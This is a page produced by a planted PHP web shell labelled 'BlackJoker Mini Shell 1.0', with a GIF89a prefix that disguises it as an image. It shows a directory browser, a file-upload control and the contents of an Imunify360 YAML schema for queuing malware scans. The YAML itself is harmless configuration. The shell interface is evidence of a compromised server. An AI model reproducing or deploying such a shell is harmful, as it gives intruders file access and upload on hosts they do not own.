GIF89a; Mini Shell

Mini Shell

Direktori : /opt/imunify360/venv/lib/python3.11/site-packages/imav/malwarelib/rpc/schema/
Upload File :
Current File : //opt/imunify360/venv/lib/python3.11/site-packages/imav/malwarelib/rpc/schema/on-demand-queue.yaml

malware on-demand queue put:
  type: dict
  return_type: NullAgentResponse
  cli:
    users:
      - root
  schema:
    paths:
      type: list
      schema:
        type: string
      required: true
      positional: true
      help: Paths to add to the queue

    prioritize:
      type: boolean
      default: false
      help: put the scans on top of the queue

    detect_elf:
      type: boolean
      default: false

    file_mask:
      type: string
      nullable: true

    ignore_mask:
      type: string
      nullable: true

    intensity:
      type: string
      nullable: true
      allowed:
        - low
        - moderate
        - high

    intensity_cpu:
      type: integer
      coerce: int
      nullable: true
      min: 1
      max: 7

    intensity_io:
      type: integer
      coerce: int
      nullable: true
      min: 1
      max: 7

    intensity_ram:
      type: integer
      coerce: int
      nullable: true
      min: 1024

    follow_symlinks:
      type: boolean
      default: false

    scan_file:
      type: boolean
      default: true

    scan_db:
      type: boolean
      default: null
      coerce: scan_db

  help: Queue on-demand scans for the selected paths

malware on-demand queue remove:
  return_type: NullAgentResponse
  cli:
    users:
      - root
  schema:
    scan_ids:
      type: list
      schema:
        type: string
      required: false
      positional: true
  help: Remove on-demand scans from the queue

./BlackJoker Mini Shell 1.0